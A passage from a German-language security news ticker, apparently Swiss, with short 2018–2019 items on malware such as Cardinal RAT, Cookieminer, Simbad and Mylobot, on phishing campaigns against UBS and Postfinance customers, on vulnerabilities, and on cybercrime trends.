"SmotherSpectre" geht gemäss Mitteilung jedoch noch weiter. "SmotherSpectre" nutzt den Datenstau (Port Contention) aus. Dieser entsteht, wenn eine Reihe von Befehlen auf einem CPU gleichzeitig ausgeführt werden sollen, aber aufgrund eines Scheduling-Konflikts nicht gleichzeitig ausgeführt werden können.

"Sogar wenn eine Software-Lösung 100-prozentig sicher ist, kann sie trotzdem von dieser Schwachstelle betroffen sein", sagt EPFL-Professor Mathias Payer. Das Problem zu lösen sei kostspielig und würde wohl die Leistung der CPUs beeinträchtigen. 

In einem Blogeintrag führen die Entdecker der Schwachstelle detailliert aus, wie die Schwachstelle funktioniert und was dagegen zu tun ist. 

25.03.2019 - 13:46 Uhr

Cardinal RAT nimmt Fintech-Firmen ins Visier

Unit 42, die Malware-Forscher von Palo Alto Networks, warnen derzeit vor dem Schadprogramm Cardinal RAT. Die Abkürzung RAT steht für Remote Access Trojan. Malware dieser Art ermöglicht dem Angreifer auf einen Rechner zuzugreifen – vergleichbar mit einer Fernwartungslösung.

Palo Alto hatte bereits 2017 vor dem Trojaner gewarnt, damals noch eine kleinvolumige Bedrohung. Nun entdeckten die Sicherheitsforscher jedoch Attacken mit einer aktualisierten Version von Cardinal RAT. Mit dem Update erhielt das Schadprogramm neue Tricks, um sich unerkannt in fremden Rechnern herumzutreiben. 

Hierfür greift die Malware etwa auf steganographische Verfahren zurück. So verschlüsselt Cardinal RAT etwa Informationen in den Pixeln einer eingebetteten Bitmap-Bilddatei. Wenn die Malware die Informationen ausliest, generiert sie daraus eine DLL-Datei.

Die aktualisierte Version – gemäss Palo Alto ist es die Version 1.7.2 – hat zudem ein klares Ziel vor Augen: die aktuell beobachteten Angriffe richten sich laut Mitteilung gegen Fintech-Unternehmen. Das Volumen bleibe jedoch weiterhin überschaubar. Palo Alto spricht von zwei zielgerichteten angegriffenen gegen Unternehmen mit Sitz in Israel. 

Unterstützt wird Cardinal RAT dabei vermutlich von der Malware-Familie EvilNum. Ein Java-Script-basiertes Schadprogramm, das bei Angriffen gegen ähnliche Unternehmen eingesetzt werde. Die beiden Schadprogramme seien bei demselben Opfer innerhalb kurzer Zeit beobachtet worden. Auch bei der Distribution zeigten sich Parallelen. Palo Alto schliesst daraus, dass dieselben Drahtzieher hinter beiden Schadprogrammen stecken könnten. 

Auf seiner Website geht Palo Alto Networks mehr ins Detail

15.03.2019 - 17:46 Uhr

Im Weltall hört dich niemand nach dem IT-Support schreien

Um den Menschen ins Weltall zu befördern, muss man an Vieles denken. Luft zum Atmen, genügend Treibstoff, um von der Schwerkraft loszukommen und die Türen zu verriegeln. Aber IT-Security gehört offensichtlich nicht dazu.

Wie eine interne Prüfung zeigt, kränkelt die IT-Abwehr der National Aeronautics and Space Administration – besser bekannt als NASA. Die US-amerikanische Raumfahrtbehörde war etwa für das Space-Shuttle-Programm der USA zuständig. 

Die Prüfung stufte die Cybersecurity der NASA auf Level zwei ein, wie The Register berichtet. Das heisst, dass die NASA zwar Abwehrprozesse und Strategien definiert und dokumentiert habe, aber diese nicht konsequent umgesetzt seien. Die NASA erhielt bereits im Vorjahr die gleiche Bewertung. 

Der Bericht zur Prüfung spricht von einer signifikanten Bedrohung für NASAs Betrieb. So seien etwa die Möglichkeiten der Raumfahrtbehörde, ihre Daten, Systeme und Netzwerke zu schützen beeinträchtigt. Und die Abwehrpläne hätten etwa fehlende, unvollständige und fehlerhafte Daten, zitiert der Bericht Jim Morrison. Gemeint ist aber nicht der verstorbene Sänger von The Doors, sondern der gleichnamige Assistant Inspector General for Audits bei der NASA.

Die NASA ist jedoch in guter Gesellschaft. Ende 2018 stellte sich heraus, dass sich die Waffensysteme des US-Militärs erstaunlich einfach hacken lassen. Mehr dazu können Sie im Eintrag vom 11.10.2018 «So einfach lassen sich US-Waffensysteme hacken» nachlesen.

15.03.2019 - 17:29 Uhr

Was haben Backdoors und goldene Ringe gemeinsam? Französisch!

15.03.2019 - 17:27 Uhr

Cyberkriminelle auf der Jagd nach Postfinance- und UBS-Kunden

Wer die E-Banking-Portale der UBS und Postfinance nutzt, sollte derzeit auf der Hut sein. Betrüger haben es auf die Zugangsdaten der Kunden abgesehen, wie das Computer Security Incident Response Team (GovCERT) der Melde- und Analysestelle Informationssicherung (Melani) warnt. 

Die Betrüger verschickten Phishing-E-Mails mit schadhaften Links. Statt auf die korrekten E-Banking-Portale, verwiesen diese auf ubsserver[.]net beziehungsweise postfinonce- logln [.]biz. 

Wer derartige E-Mails erhalten hat, sollte sie löschen und nicht auf den Link klicken. Melani ruft zudem dazu auf, verdächtige E-Mails oder Websites auf antiphishing.ch zu melden.

15.03.2019 - 17:23 Uhr

39 Prozent der Counter-Strike-Server verteilen Trojaner 

Die Debatte um die schädlichen Auswirkungen von Videospielen auf den Menschen hält zwar noch an. Die Debatte um die schädlichen Auswirkungen von Videospielen auf die IT-Infrastruktur ist jedoch eher einseitig. 

Das jüngste Beispiel: Counter Strike 1.6 – ein Online-Taktik-Shooter aus dem Jahr 2000. Unterdessen veröffentlichte der Entwickler Valve zwar bereits mehrere Nachfolger, darunter Counter Strike Source und Counter Strike Global Offensive. Dennoch wird das Original auch knapp 20 Jahre nach der Lancierung weiterhin rege gespielt.

Rund 5000 Server werden dafür genutzt, Counter-Strike-Partien zu hosten. Und 39 Prozent davon verbreiteten Malware, wie Bleepingcomputer berichtet. Die Zahlen kommen vom Anti-Virus-Anbieter Dr. Web. 

Ein Cyberkrimineller, der sich selbst Belonard nennt, nutzte eine Schwachstelle im Game Client aus, um Trojaner auf den Rechnern der Spieler zu laden. Diese fangen prompt an, Dateien im Game Client zu ersetzen. Der Cyberkriminelle wollte so andere Server und Websites gegen Bezahlung bewerben. So ändert der Trojaner etwa die Gamertags der Spieler in die URLs seiner Kunden.  

Dr. Web nahm nach eigenen Angaben zwar die schadhaften Domains vom Web. Aber die Sicherheitslücke kann nur Valve schliessen. Das Spiel wird jedoch nicht mehr unterstützt. Wann und ob die Lücke geschlossen wird, ist also unklar.

15.03.2019 - 17:17 Uhr

Simbad-Adware segelt auf Google Play Store

Die Sicherheitsforscher von Check Point haben einer Adware-Kampagne im Google Play Store das Handwerk gelegt. Die grossangelegte Kampagne war auf 206 Apps verteilt. Sie alle verbreiteten das Schadprogramm Simbad, wie Check Point mitteilt. 150 Millionen Nutzer waren betroffen.

Der Name erinnert an eine Figur aus Tausendundeiner Nacht. Die Sicherheitsforscher wählten ihn jedoch, weil der Löwenanteil der schädlichen Apps Simulations-Spiele waren, wie es in der Mitteilung heisst. 

Einmal auf dem Smartphone installiert, will die Malware auch auf dem Gerät bleiben. Zu diesem Zweck entfernt sie etwa das Icon, was es für den Nutzer schwieriger macht, die App zu löschen. Das Opfer wird anschliessend mit unzähligen Werbeanzeigen überflutet – die Einnahmequelle der Cyberkriminellen.

Simbad kann aber noch mehr: Das Schadprogramm kann zudem willkürlich andere Anwendungen öffnen und URLs über den Browser aufrufen. Und gemäss Check Point habe die Malware auch das Potenzial, eine noch grössere Bedrohung zu werden.

Google hat die betroffenen Apps bereits aus dem Store entfernt, allerdings sind die Applikationen noch auf den Geräten der Nutzer installiert, wie Check Point mitteilt. Wie die Sicherheitsforscher vermuten, waren die Entwickler dieser Apps selbst Opfer eines Betrugs. Möglicherweise nutzten sie das bösartige-Software Development Kit (SDK) RXDrioder ohne den tatsächlichen Inhalt zu kennen. 

Den vollständigen Bericht der Sicherheitsforscher zu Simbad können Sie auf der Website von Check Point lesen.

18.02.2019 - 21:07 Uhr

Frau in Bellinzona wegen Voice Phishing angeklagt

Die Bundesanwaltschaft hat in Bellinzona Klage wegen Voice Phishing erhoben. Die angeklagte Frau soll über das Telefon ihre Opfer dazu gebracht haben, die Zugangsdaten zum E-Banking zu nennen. Bei rund 50 Personen habe sie erfolgreich Überweisungen tätigen können und so mehr als 2 Millionen Franken erbeutet, wie die Bundesanwaltschaft mitteilt. Dabei handle es sich um den gewerbsmässigen betrügerischen Missbrauch einer Datenverarbeitungsanlage (Art. 147 Abs. 1 i.V.m. Abs. 2 StGB), wie es in einer Mitteilung heisst

Die angeklagte Frau sei demnach Mitglied einer kriminellen Gruppierung, welche von März 2016 bis Juli 2018 in der Schweiz aktiv war. Verhaftet wurde die Frau in Rotterdam – in Zusammenarbeit mit den niederländischen Behörden, Fedpol und Eurojust. 

Im Rahmen eines abgekürzten Verfahrens liegt der Fall nun beim Bundesstrafgericht. Bei einem abgekürzten Verfahren muss die angeklagte Person unter anderem im Wesentlichen geständig sein. Anstatt über alle Einzelheiten Beweis zu führen, prüft das Gericht ledig einen vorgefertigten Anklageentwurf inklusive Urteilsvorschlag. Die beschuldigte Person muss mit diesem Entwurf einverstanden sein.

 

18.02.2019 - 20:57 Uhr

Android-Malware nutzt faule Krypto-Nutzer aus

Kryptowährungen haben auch etwas Lästiges an sich. Wer Gelder überweisen oder empfangen will, braucht eine Wallet-Adresse. Doch wer will heute noch 27- bis 34-stellige alphanumerische Codes von Hand abtippen? Die deutlich bequemere Art ist doch, den Code einfach zu copy-pasten. 

Doch genau diese Bequemlichkeit nutzen Cyberkriminelle gerne aus. Die Sicherheitsforscher von Eset entdeckten ein Schadprogramm auf Android-Smartphones. Diese sogenannte Clipper-Malware liest und verändert den Inhalt in der Zwischenablage. Eset gab ihr den Namen Android/Clipper.C.

Das Opfer kopiert also die Wallet-Adresse, die sein Geld erhalten soll. Die Adresse landet in der Zwischenablage, wo die Clipper-Malware sie ersetzt durch die Adresse des Cyberkriminellen. Wenn das Opfer anschliessend die vermeintliche Adresse des Empfängers hineinkopiert, gibt er die Adresse des Angreifers ein. 

Derartige Schadprogramme sind nicht neu. Clipper traten erstmals 2017 auf Windows-Geräten auf. 2018 kamen die ersten Android-Ableger in fragwürdigen App-Stores auf. Doch Android-Nutzer, die ihre Apps ausschliesslich über den offiziellen Google Play Store kaufen, waren bis jetzt sicher. 

Bis jetzt. «Jetzt betrifft das Problem auch den durchschnittlichen Android-Anwender», sagt ESET Malware Forscher Lukáš Štefanko. Denn Eset fand diesen neuen Schädling im offiziellen Play Store. «Zum Glück haben wir den Clipper bereits kurz nach seinem Upload in den Store entdeckt. Wir haben den Sachverhalt dem Google Play Security Team gemeldet, welches kurz daraufhin die App entfernte», sagt Štefanko.

Mehr Informationen zur Clipper-Malware, die sich als App-Version des legitimen Diensts Metamask ausgab, bietet Eset auf seiner Website.

 

18.02.2019 - 20:43 Uhr

Krümelmonster will Kryptowährungen von Mac-Nutzern

Palo Alto hat ein Krümelmonster entdeckt, das sich auf Macs herumtreibt und Heisshunger hat auf Cookies. Daher taufte Palo Alto die Malware "Cookieminer". Die Cookies sammelt das Schadprogramm auf Kryptowährungsbörsen wie etwa Coinbase. 

Das Schadprogramm stiehlt auch gespeicherte Passwörter sowie iPhone-Textnachrichten von iTunes-Back-ups. Indem es alle diese Infos kombiniert, will Cookieminer Multifaktor-Authentifizierungen aushebeln. Wenn der Angreifer sich etwa von einem fremden Rechner mit gestohlenen Zugangsdaten anmeldet und zugleich ein Authentifizierungs-Cookie bereitstellt, wird der Anmeldeversuch wohl nicht als verdächtig eingestuft.

Einmal angemeldet, kann der Angreifer beginnen, Gelder abzuheben. Theoretisch könnte der Angreifer – sofern er genügend Opfer hat – mit grossvolumigen Käufen oder Verkäufen auch den Markt und die Marktpreise manipulieren.

18.02.2019 - 20:34 Uhr

Anzahl CEO-Scams nehmen seit Vorjahr massiv zu 

Der kalifornische IT-Security-Anbieter Proofpoint hat seinen vierteljählrichen Threat Report veröffentlicht. Wie aus der Mitteilung zum Bericht für das vierte Quartal 2018 (als PDF herunterladen) hervorgeht, stieg die Bedrohung durch Social Engineering und E-Mails für Unternehmen drastisch an. 

Einer der Schwerpunkte des Reports sind sogenannte CEO-Scams per E-Mail. Dabei täuscht der Angreifer dem Opfer etwa in einer E-Mail vor, eine vorgesetzte Person zu sein - wie etwa der CEO. In der Regel läuft es darauf hinaus, dass das Opfer aufgefordert wird, eine Zahlung zu tätigen.

Im vierten Quartal 2017 hätten Unternehmen durchschnittlich rund 21 solcher E-Mails erhalten. Ein Jahr später hat sich diese Zahl beinahe versechsfacht. Im vierten Quartal 2018 zählte Proofpoint im Schnitt bereits 121 derartige Betrugsversuche pro Unternehmen. Auch im Vergleich zum Vorquartal sei dies eine massive Steigerung, schreibt der Sicherheitsanbieter.

Wie Proofpoint schreibt, seien Unternehmen mit einer sich ständig verändernden Bedrohungslandschaft konfrontiert. Dennoch sei es ratsam, herkömmliche Cyberattacken per E-Mail nicht zu unterschätzen. Um derartige Betrugsversuche abzuwehren, sollten Firmen ihre Mitarbeiter entsprechend schulen. 

18.02.2019 - 20:25 Uhr

DDoS-Attacken werden zunehmend gefährlicher

Im Jahr 2018 ist die Anzahl DDoS-Attacken um rund 13 Prozent gesunken, wenn man es mit dem Vorjahr vergleicht. Der grösste Rückgang war im vierten Quartal 2018. In dem Zeitraum gingen die Attacken um 30 Prozent zurück. Dies geht aus dem aktuellen DDoS-Report von Kaspersky hervor. 

Wie aus dem Report ebenfalls hervorgeht, ist dies jedoch keineswegs eine erfreuliche Nachricht. Denn zur gleichen Zeit nahm die Dauer von gemischten und http-Flood-Angriffen zu, wie Kaspersky mitteilt. Dies deute darauf hin, dass die Angreifer komplexe Methoden nutzen, um die DDoS-Abwehr von Unternehmen zu umgehen. 

Derartige Schutzmassnahmen machen Standard-DDoS-Attacken fast schon nutzlos. Daher schrumpfe auch der Markt für derartige Tools. Die Attacken dieser Art, die noch vorkommen, zielten wohl eher darauf ab, die Abwehr der Opfer zu testen. Denn die Angreifer wüssten schon nach wenigen Minuten, ob ihre Attacke erfolgreich sei oder nicht. 

Kaspersky geht davon aus, dass sich dieser Trend fortsetzen wird. Auch 2019 werde sich die Anzahl Attacken verringern, während die Dauer, Angriffsbandbreite und Effekt der Attacken zunehme. Entsprechend würden auch die Anbieter von DDoS-Attacken stetig versierter werden. 

Mehr zum DDoS-Report von Kaspersky bietet das Unternehmen auf seiner Website.

22.01.2019 - 15:37 Uhr

Diese Ransomware tut zweimal weh

Das Malwarehunterteam hat eine scheinbar völlig unscheinbare Ransomware gefunden. Wie alle anderen seiner Art, verschlüsselt auch dieses Schadprogramm die Daten seiner Opfer. Eine Lösegeldforderung instruiert das Opfer anschliessend, wie es seine Daten wiederhaben kann. Genauso wie es auch bei jeder anderen Ransomware-Infektion passiert – zumindest fast. Denn in diesem Erpresserbrief ist eine fiese zweite Attacke auf das Opfer versteckt. 

Der Erpresserbrief bietet dem Opfer vermeintlich die Option, das Lösegeld via Paypal zu zahlen – statt wie üblich in Bitcoin. Wer dies jedoch versucht, wird nicht zu Paypal weitergeleitet, sondern zu einer Phishing-Site. Die falsche Paypal-Website sieht der echten täuschend ähnlich. Diese versucht anschliessend, die Zugangs- und die Kreditkartendaten des Opfers zu stehlen, wie Bleepingcomputer berichtet

 

 

Wer seine Zugangsdaten eingetippt und abgesendet hat, wird anschliessend zur richtigen Adresse von Paypal weitergeleitet, die ihn erneut auffordert, sich einzuloggen. Gefunden hatte die Ransomware das Malwarehunterteam.

Die Lektion, die man daraus ziehen kann? Immer zuerst die Website überprüfen, bevor man seine Zugangs- und Zahlungsinformationen eingibt. Insbesondere wenn Kriminelle gerade versuchen, jemandem das Leben zu vereinfachen.

22.01.2019 - 15:34 Uhr

Skype durchlöchert Androids Bildschirmsperre 

Der Messaging- und VoIP-Dienst Skype kann, was wohl so manchem Cyberkriminellen nicht gelingt: Die Microsoft-Applikation kann mühelos ein Android-Handy entsperren und unerlaubten Zugriff auf das Gerät gewähren. Entdeckt hatte die Sicherheitslücke der Bughunter Florian Kunushevci, wie The Register berichtet

Um diese Lücke auszunutzen, muss der Angreifer lediglich einen Skype-Anruf auf dem gesperrten Smartphone annehmen. Hierfür muss er das Gerät nicht entsperren. Sobald die Verbindung steht, funktioniert die Skype-App als sei das Handy im entsperrten Modus. 

So kann der Angreifer durch antippen des Profilbildes des Anrufers auf verschiedene Funktionen des Smartphones zugreifen. Darunter etwa auf sämtliche Bilder und Fotoalben, die Namen und Nummern aller Kontakte sowie auf den Webbrowser, wie Kunushevci in einem Youtube-Video demonstriert. 

Dass ein Angreifer die Skype-App auf diese Weise ausnutzen könne, sei wohl schlicht übersehen worden, heisst es in dem Bericht. Die Lücke betreffe sämtliche Skype- und auch alle Android-Versionen. Kunushevci hatte Microsoft, den Anbieter von Skype, bereits vergangenen Oktober kontaktiert. Das Dezember-Update von Skype behebt dieses Problem.

22.01.2019 - 15:27 Uhr

Die unheimliche Stimme aus der Kamera

Eine Überwachungskamera in den eigenen vier Wänden kann vor Schaden schützen. Doch eine WLAN-fähige Überwachungskamera, die zudem auch noch ungeschützt ist, kann noch sehr viel mehr Schaden verursachen. 

Dies musste Andy Gregg, ein Immobilienmakler aus Arizona, am eigenen Leib erfahren. Zum Glück allerdings auf die sanfte Art. Gregg war im Garten, als aus seinem Haus plötzlich eine unbekannte Stimme drang, wie die Lokalzeitung The Arizona Republic berichtet

Die Stimme kam jedoch nicht von einem Einbrecher, sondern von seiner Nest-Netzwerkkamera. Auf die Frage, wer sie sei, antwortete die Stimme: «Sie kennen mich nicht. Ich bin ein Sicherheitsforscher aus Kanada.» Der Sicherheitsforscher – nach eigenen Angaben Teil des Anonymous Calgary Hivemind – hatte Greggs Kamera gehackt. 

Nicht, um Gregg auszuspionieren. Sondern um ihn zu warnen, wie unsicher solche Kameras sind. Gregg und der freundliche kanadische Hacker plauderten für eine Weile. Der Sicherheitsforscher machte Gregg darauf aufmerksam, was er theoretisch alles an privaten Informationen auf diese Weise erlangen könnte und gab ihm Sicherheitstipps, wie er das vermeiden könne. Gregg, das unbeschadete Opfer, zeichnete das ganze Gespräch auf und postete es online. 

Der Hacker verabschiedete sich wieder – nachdem er sich mehrmals für seinen Auftritt und den daraus resultierenden Schrecken entschuldigte. 

22.01.2019 - 15:16 Uhr

4,3 Prozent aller Monero-Coins durch Cryptomining erwirtschaftet

Forscher der Universität Carlos III in Madrid und des King’s College in London haben 4,4 Millionen Malware-Proben analysiert. Die Proben wurden zwischen 2007 und 2018 gesammelt. Von diesen Proben ausgehend, berechneten die Forscher, wie viel Monero-Coins Cyberkriminelle durch Cryptomining erbeutet haben. 

Monero gehört zu den Kryptowährungen. Anders als etwa Bitcoin, bietet Monero viel mehr Möglichkeiten, anonyme Transaktionen durchzuführen. Dies macht die Währung sehr populär bei Cyberkriminellen. Sie nutzen etwa Cryptominer, um die Rechenleistung ihrer Opfer anzuzapfen. Mit dieser Rechenleistung schürfen sie anschliessend nach Monero. 

Die Forscher nutzten verschiedene Methoden und holten diverse Datenbanken und öffentliche Zahlungsbelege. Sie kamen zu dem Schluss, dass mindestens 4,3 Prozent des sich in Form von Monero zirkulierenden Geldes durch Cryptominer geschürft wurden. Den Cyberkriminellen spülte dies demnach bis zu 56 Millionen US-Dollar in die Kassen. 

Der Gewinn dürfte relativ hoch sein. Schliesslich ist die finanzielle Einstiegsschwelle sehr tief. Ausserdem, so schreiben die Forscher in ihrer Arbeit, habe die IT-Security-Branche das Risiko durch Cryptominer lange unterschätzt. 

Im Vergleich zu anderen Formen der Cyberkriminalität ist der Schaden durch Cryptominer beim Opfer eher gering. Ein betroffenes Unternehmen hat potenziell höhere Betriebskosten, weil es für mehr Rechenleistung aufkommen muss. Zum Vergleich: Der durchschnittliche Schaden einer Cyberattacke liegt gemäss einer Studie von Radware bei rund 1 Million Euro.   

Interessierte können die komplette Forschungsarbeit zum illegalen Geschäft mit Monero online als PDF herunterladen.
 

11.01.2019 - 15:52 Uhr

Diese Cyberbedrohungen terrorisieren das neue Jahr

Der israelische Anbieter von IT-Sicherheitslösungen Check Point hat am 10. Januar zum Neujahrslunch geladen. In kleiner Runde sprach Sonja Meindl, Country Manager von Check Point ALPS, über die IT-Security-Trends von 2018 und wie sich diese 2019 weiterentwickeln werden. Zwei Themen waren vergangenes Jahr fast omnipräsent, sagte Meindl: Cryptomining und Ransomware. 

Cryptomining – still aber sehr gefährlich

Hinter dem Begriff stecken zumeist unscheinbare Skripte, die jedoch grossen finanziellen Schaden anrichten können. Ohne Mitwissen des Nutzers, zapfen diese Schädlinge die Rechenleistung ihrer Opfer an, um damit nach Kryptowährungen zu schürfen. 

Die Entwicklung dieser Bedrohung sei exponentiell – wohl auch wegen dem Hype um Bitcoin und andere Kryptowährungen von 2018. 40 Prozent der Unternehmen seien davon betroffen. Im Vorjahr waren es noch 20 Prozent. Die tatsächliche Anzahl betroffener Unternehmen liegt aber wohl viel höher. Denn gemäss Meindl wissen die meisten Firmen nicht, ob ein Cryptominer ihre Ressourcen anzapft oder nicht. 

Cryptominer stehlen keine Daten und verschlüsseln sie auch nicht. Die Bedrohung, die von ihnen ausgeht, wird daher oft unterschätzt. Wenn ein Unternehmen etwa auf Cloud-Computing setzt, könnten die rechenintensiven Cryptominer die Kosten stark in die Höhe treiben.

Ransomware – der fiese Platzhirsch

Auch Ransomware ist "überraschenderweise" weiterhin ein Thema, scherzte Meindl. Das Geschäft mit Erpressungsprogrammen sei ein sehr lukratives Business. Darum werden gemäss Meindl derartige Schädlinge auch zunehmend beliebter und auch 2019 noch ein Thema bleiben.

Eine Ransomware verschlüsselt nach der Infektion eines Rechners sämtliche oder ausgewählte Dateien auf dem Gerät. Statt der gewohnten Benutzeroberfläche sehen die Opfer lediglich einen Sperrbildschirm mit einer Lösegeldaufforderung.
Die Bandbreite solcher Attacken ist immens. Sie reichen von sehr gezielten Angriffen bis zu grossangelegten Kampagnen mit kleineren Lösegeldern, um möglichst viele Opfer zum bezahlen zu bewegen.

Mangelnde E-Mail-Hygiene in der Schweiz

Global gesehen erfolgen gemäss Meindl 45 Prozent der Infektionen über das Web und 55 über schädliche E-Mails. In der Schweiz sei dieses Verhältnis jedoch ein wenig anders. Ganze 75 Prozent der Infektionen würden hierzulande von schädlichen E-Mails ausgehen – und lediglich 25 kämen aus dem Web.

Auch die Verteilung nach Herkunftsländern zeigt deutliche Unterschiede. 50 Prozent der globalen Bedrohungen kommen gemäss Check Point aus China. Die meisten Cyberbedrohungen in der Schweiz kommen jedoch aus den USA (37 Prozent), gefolgt von Deutschland (24 Prozent). Lediglich 7 Prozent der hiesigen Schädlinge kommen auch aus der Schweiz.  

Cyberkriminelle suchen sich Freunde

Das Ransomware-Geschäft ermöglichte sogar das Aufkommen völlig neuer krimineller Industrien – wie etwa der Fall von Dr. Shifro zeigte. Der vermeintliche IT-Berater gab vor, Ransomware-Opfer helfen zu wollen, ihre Daten wieder zurück zu erhalten.

Tatsächlich stand Dr. Shifro jedoch in Kontakt mit den Autoren der Erpresserprogramme und machte einen Deal mit ihnen. Er bezahlte die Lösegelder, wälzte die Kosten auf seine "Kunden" ab und verrechnete für seine Dienste eine hohe zusätzliche Gebühr. 

Sonja Meindl, Country Manager von Check Point ALPS (Quelle: Check Point)

Sonja Meindl, Country Manager von Check Point ALPS (Source: Check Point)

Dahinter steckt ein weiterer Trend, den Check Point derzeit beobachtet und was das Unternehmen als "Malware Synergy" bezeichnet: Cyberkriminelle kombinieren vermehrt Schadprogramme, um ihren Profit zu steigern. 

So infizieren sie etwa einen Rechner nicht nur mit einem Cryptominer. Stattdessen stehlen sie zugleich auch sensible Daten, um diese verkaufen zu können oder installieren eine Backdoor im System. Um diese unterschiedlichen Ziele zu erreichen, finden sich Cyberkriminelle mit unterschiedlichen Spezialgebieten im Darknet zusammen.

Wie man sich gegen all diese Risiken wappnen kann? Meindl rät diesbezüglich vor allem eins: den Notfall trainieren. Wer einen Plan für Cyberattacken hat, weiss auch, wie er im Falle eines Angriffs reagieren soll. "Leider tun das aber immer noch nur die wenigsten Unternehmen", sagte Meindl.

23.11.2018 - 18:19 Uhr

Verschlüsselter Schweizer E-Mail-Dienst gehackt – oder doch nicht?

Wer seine E-Mails verschlüsselt, will natürlich nicht, dass deren Inhalte publik werden. Um dies zu verhindern, greift man auf Anbieter wie Protonmail zurück. Der E-Mail-Dienst des Schweizer Unternehmens Proton Technologies bietet den Nutzern eine sichere Ende-zu-Ende-verschlüsselte E-Mail-Kommunikation.

Ein Unbekannter, der sich selbst AmFearLiathMor nennt, behauptet nun aber, Protonmail gehackt zu haben. Er habe Zugriff auf die persönlichen Daten der Nutzer und auf die Inhalte der von ihnen verschickten verschlüsselten E-Mails. Zudem behaupte AmFearLiathMor, dass Protonmail Kundeninformationen an US-amerikanische Server schicke, wie Bleepingcomputer berichtet

Wenn Proton Technologies die Daten zurück will, muss das Unternehmen "eine kleine Summe" zahlen, wie der Unbekannte schreibt. Wer den Erpresserbrief, in dem auch aus gewissen angeblich gehackten E-Mails zitiert wird, auf Social Media verbreite, erhalte 20 US-Dollar in Bitcoin.

 

 

"Reiner Schwindel", kontert jedoch Proton Technologies. Das Unternehmen habe keine Anhaltspunkte gefunden, dass an dieser Behauptung etwas dran sei. Von einem technischen Standpunkt aus sei vieles, was der Erpresser behaupte, nicht möglich. 

Die im Epresserbrief zitierten Mail-Inhalte würden wie ein Witz klingen, heisst es im Bericht. Sie würden alles abdecken, von Vertragsverletzungen in der Antarktis über Umgehungen der Genfer Konventionen bis zu Aktivitäten von Unterwasserdrohnen im Pazifik. Auch liegen keine Berichte vor, dass irgendwer die versprochenen 20 Dollar für das Teilen des Erpresserbriefs erhalten hat.

Der Name des Erpressers entstammt der schottischen Folklore. Am Fear Liath Mòr, auch als der grosse graue Mann bekannt, ist eine Kreatur, die auf dem Berg Ben Macdhui leben soll. Das mythische Wesen ist angeblich 6 Meter gross und mit Yeti oder Bigfoot vergleichbar. Genauso unwirklich ist wohl auch die Drohung von AmFearLiathMor.
 

23.11.2018 - 18:09 Uhr

Huch? Was macht dieser Raspberry im abgesperrten Serverraum?!

Was macht man, wenn man im Serverraum, den man verwaltet, plötzlich einen Raspberry Pi entdeckt? Ohne auch nur die geringste Ahnung, woher das Gerät kommt und was es macht. In einem abgeschlossenen Serverraum, zu dem fast niemand Zugang hat.

Ein IT-Leiter einer österreichischen Hochschule, der sich mit just diesem Problem konfrontiert sah, wusste schnell Rat: Er fragte mal auf Reddit nach, was das sein könnte. Und die Reddit-Community war tatsächlich hilfreich, wie The Register berichtet.

Schon bald war das Gerät identizifert. Es handelte sich um ein nRF52832-MDK. Ein IoT-Gadget, das sich über Bluetooth und WLAN verbinden kann. Kostenpunkt: etwa 30 US-Dollar. Aber was macht es da? Die Antwort kam sogleich: definitiv ein Keylogger!

Tatsächlich befindet sich der Serverraum, in dem der rätselhafte Raspberry eingesteckt war, nur wenige Meter neben dem Büro des CEOs. Durchaus denkbar also, dass jemand versucht, die Tastenanschläge oder die Netzwerkaktivitäten des Chefs aufzuzeichnen. Was das Ganze noch spannender macht: Auf dem Raspberry lief ein Programm namens logger. 

Was dahinter steckt, hat der IT-Leiter noch nicht herausgefunden. Aber dafür wer dahinter steckt. Von der Geschäftsleitung erfuhr er, dass ein ehemaliger Mitarbeiter noch immer einen Schlüssel zum Serverraum hat. Nur wenige Minuten bevor das Gerät erstmals registriert wurde, versuchte irgendwer sich mit dem Benutzernamen des ehemaligen Mitarbeiters einzuloggen. 

Der Zugriffsversuch wurde zwar blockiert – Identity Access Management (IAM) sei Dank. Doch die Geschichte zeigt auch, dass IAM sich nicht auf die digitalen Zugangsmöglichkeiten beschränken sollte. 
 

23.11.2018 - 17:58 Uhr

Zuerst Westeros, dann der Cyberraum: Malware Khalesi im Anmarsch

Das Botnetz Mylobot ist noch relativ jung. Es wurde erst im Juni dieses Jahres entdeckt. Der Entdecker: der US-amerikanische Telko Centurylink. Das Botnetz verfüge über fortschrittliche Methoden, um sich vor seinen Opfern zu verstecken. So «schläft» es etwa nach der Infektion erst mal zwei Wochen. Erst dann kontaktieren die infizierten Rechner den "Command and Control"-Server. 

Centurylink will nun herausgefunden haben, was Mylobot genau macht. Nachdem das Botnetz einen Rechner infiziert hat, lädt es in einem zweiten Schritt eine Malware namens Khalesi herunter. Das Schadprogramm sei darauf spezialisiert, Informationen zu stehlen.

Der Name erinnert an die populäre Buchreihe und TV-Serie Game of Thrones. Eine der Hauptfiguren ist Daenerys Targaryen, auch bekannt als Khaleesi  (Mit zwei statt einem ‘e’). Wenn diese nicht gerade Drachen aufzieht, versucht sie, die Welt zu erobern. Im Gegensatz zu ihrem Malware-Namensvetter allerdings mit mehrheitlich guten Absichten.  

Die Malware könnte jedoch auch einfach nach ihrem Entwickler benannt worden sein. Schliesslich ist Khalesi auch ein arabischer Familienname. Die Verbreitung der Malware deutet durchaus in diese Richtung . So kommt das Schadprogramm vor allem in Iraq, Iran, Argentinien, Russland, Vietnam, China, Indien, Saudi-Arabien, Chile und Ägypten vor.
 

23.11.2018 - 17:52 Uhr

In Österreich kennen Polizisten die Zukunft

Sein Blick schweift über die grossen Displays, die seinen Arbeitsplatz ausmachen. Eine Karte leuchtet auf, sie zeigt dem Polizisten, wann und wo das nächste Verbrechen begangen wird. Die Szene könnte direkt aus dem Film «Minority Report» – basierend auf dem gleichnamigen Buch von Philip K. Dick -stammen. 

Aber genau so spielt es sich derzeit im Bundeskriminalamt in Wien ab. Dort setzt die österreichische Juistiz auf "predictive Policing" - die Vorhersage von Verbrechen mithilfe von Algorithmen, wie der Standard schreibt. Anders als der Begriff vermuten lässt, sei die Arbeit aber nicht vorhersagend, sondern vorhersagenbasiert. Etwa in Form von Hotspot-Analysen auf einer Karte. 

Algorithmen pflügen zu diesem Zweck durch Österreichs Falldaten. Anhand dessen, was geschehen ist, schliessen die Programme auf das, was wohl geschehen könnte. Diese Informationen über das zukünftige Verhalten von Kriminellen treiben so laufende Ermittlungen voran. 

